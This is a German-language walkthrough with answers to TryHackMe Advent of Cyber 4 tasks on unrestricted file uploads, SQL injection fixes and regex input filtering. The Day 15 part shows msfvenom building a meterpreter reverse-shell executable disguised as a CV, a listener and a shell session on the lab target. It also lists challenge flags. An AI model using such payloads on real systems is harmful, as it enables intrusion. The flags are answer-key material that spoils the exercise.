https://tryhackme.com/room/adventofcyber4
Task 20 [Day 15] Secure Coding Santa is looking for a Sidekick
Frage 1:
What is the name given to file uploads that allow threat actors to upload any files that they want?
Antwort 1:
unrestricted
Frage 2:
What is the title of the web application developed by Santa’s freelancer?
Antwort 2:
SantaSideKick2
Frage 3:
What is the value of the flag stored in the HR Elf’s Documents directory?
Wir erstellen unsere Payload und starten den Listener, dann warten wir auf den „Rückruf“:
root@ip-10-10-87-226:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.87.226 LPORT=1234 -f exe -o cv-username.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: cv-username.exe
root@ip-10-10-87-226:~# sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.87.226; set LPORT 1234; exploit"
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 10.10.87.226
LPORT => 1234
[*] Started reverse TCP handler on 10.10.87.226:1234
[*] Sending stage (201283 bytes) to 10.10.231.60
[*] Meterpreter session 1 opened (10.10.87.226:1234 -> 10.10.231.60:49866) at 2022-12-16 17:38:07 +0000
meterpreter > Nun müssen wir nur etwas auf der Machine nach der Flag suchen. Hier die verkürzte Fassung:
meterpreter >cd ..
meterpreter >cd ..
meterpreter >cd Users
meterpreter >cd HR_Elf
meterpreter >cd Documents
meterpreter >cat flag.txt
THM{Naughty.File.Uploads.Can.Get.You.RCE}Antwort 3:
THM{Naughty.File.Uploads.Can.Get.You.RCE}
Frage 4:
What defence technique can be implemented to ensure that specific file types can be uploaded?
Antwort 4:
File Extension Validation
Frage 5:
What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?
Antwort 5:
File Renaming
Frage 6:
What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?
Antwort 6:
Malware Scanning
Task 21 [Day 16] Secure Coding SQLi’s the king, the carolers sing
Frage 1:
What is the value of Flag1?
In Zeile 17 (elf.php) müssen wir den Code zu folgendem ändern:
$query="select * from toys where creator_id=".floatval($_GET['id']);Nun lassen wir den Code von den Elfen überprüfen und erhalten unsere Flag.
Antwort 1:
THM{McCode, Elf McCode}
Frage 2:
What is the value of Flag2?
Zeile 4 und 5 (search-toys.php) ersetzen wir durch folgenden Code:
$q = "%".$_GET['q']."%";
$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $q, $q);
mysqli_stmt_execute($stmt);
$toys_rs=mysqli_stmt_get_result($stmt);Antwort 2:
THM{KodeNRoll}
Frage 3:
What is the value of Flag3?
In Zeile 37 (toy.php) müssen wir den Wert der Zahl der Kinder auf Integer (nur Zahlen) ändern:
$query="select * from kids where assigned_toy_id=".intval($_GET['id']);Antwort 3:
THM{Are we secure yet?}
Frage 4:
What is the value of Flag4?
Wie in Frage 2 müssen wir die Eingabe validieren. Hierzu ändern wir den ersten Block (login.php) zu folgendem:
if(isset($_POST['username']) && isset($_POST['password'])){
$username=$_POST['username'];
$password=$_POST['password'];
$query="select * from users where username=? and password=?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
mysqli_stmt_execute($stmt);
$users_rs=mysqli_stmt_get_result($stmt);Antwort 4:
THM{SQLi_who???}
Task 22 [Day 17] Secure Coding Filtering for Order Amidst Chaos
Frage 1:
Filtering for Usernames: How many usernames fit the syntax above?
Die genaue Angabe finden wir in dem Bereich „Exercise“, etwas weiter oben: „Filtering for Usernames: Alphanumeric, minimum of 6 characters, maximum of 12 characters, may consist of upper and lower case letters.“
Enter your regex here: ^[a-zA-Z0-9]{6,12}$
9z8yMc9T
31337aq
39C3qxP
R6fUTY2nC8
9Qe5f4
User35
u3Y73h3
5Xze553jAntwort 1:
8
Frage 2:
Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?
Die Antwort finden wir in der Ausgabe von Frage 1.
Antwort 2:
User35
Frage 3:
Filtering for Emails: How many emails fit the syntax above?
Auch hier gucken wir bei Exercise nach: „Filtering for Emails: Follows the form „local-part@domain“ (without quotation marks); local-part is a random string, and the domain is in the form of „<domain name>.tld“. All top-level domains (tld) are „.com““
Enter your regex here: ^.+[@].+\.com$
br33zy@gmail.com
lewisham44@amg.com
johnny.the.sinner@yahoo.com
badyeti@gmail.com
maxximax@fedfull.com
jklabada@tryhackme.com
johnny.the.sinner@yahoo.com
hunter4k@canary.com
hussain.volt@hotmail.com
marckymarc@tryhackme.com
batteryvoltas@alfa.comAntwort 3:
11
Frage 4:
Filtering for Emails: How many unique domains are there?
Die Antwort finden wir in der Ausgabe von Frage 3.
Antwort 4:
8
Frage 5:
Filtering for Emails: What is the domain of the email with the local-part „lewisham44“?
Die Antwort finden wir in der Ausgabe von Frage 3.
Antwort 5:
amg.com
Frage 6:
Filtering for Emails: What is the domain of the email with the local-part „maxximax“?
Die Antwort finden wir in der Ausgabe von Frage 3.
Antwort 6:
fedfull.com
Frage 7:
Filtering for Emails: What is the local-part of the email with the domain name „hotmail.com“?
Die Antwort finden wir in der Ausgabe von Frage 3.
Antwort 7:
hussain.volt
Frage 8:
Filtering for URLs: How many URLs fit the syntax provided?
Unter Exercise finden wir die genauen Details: „Filtering for URLs: Starts with either http or https; some of the URLs have „www“, and a TLD should exist.“
Enter your regex here: ^http(s)?\://(www\.)?.+\..+$
http://www.sample.net/blood?ghost=force
http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html
http://koch.com/quae-perspiciatis-non-unde-quo
http://johns.net/nisi-quis-dolorum-et-rerum
https://www.sample.edu/#fire
http://www.sample.info/?mint=trouble&action=move
https://www.sample.org/?quiet=expansion&grip=eggnog
http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur
http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore
https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam
https://www.sample.com/?air=color&cave=judge#shake
http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html
https://runolfsson.com/esse-ab-rerum-et-quis-aut.html
https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus
https://horse.sample.com/shape/company?mom=collar#donkey
http://batz.com/reprehenderit-voluptate-id-soluta-tenetur
Antwort 8:
16
Frage 9:
Filtering for URLs: How many of these URLs start with „https“?
Die Antwort finden wir in der Ausgabe von Frage 8.
Antwort 9:
7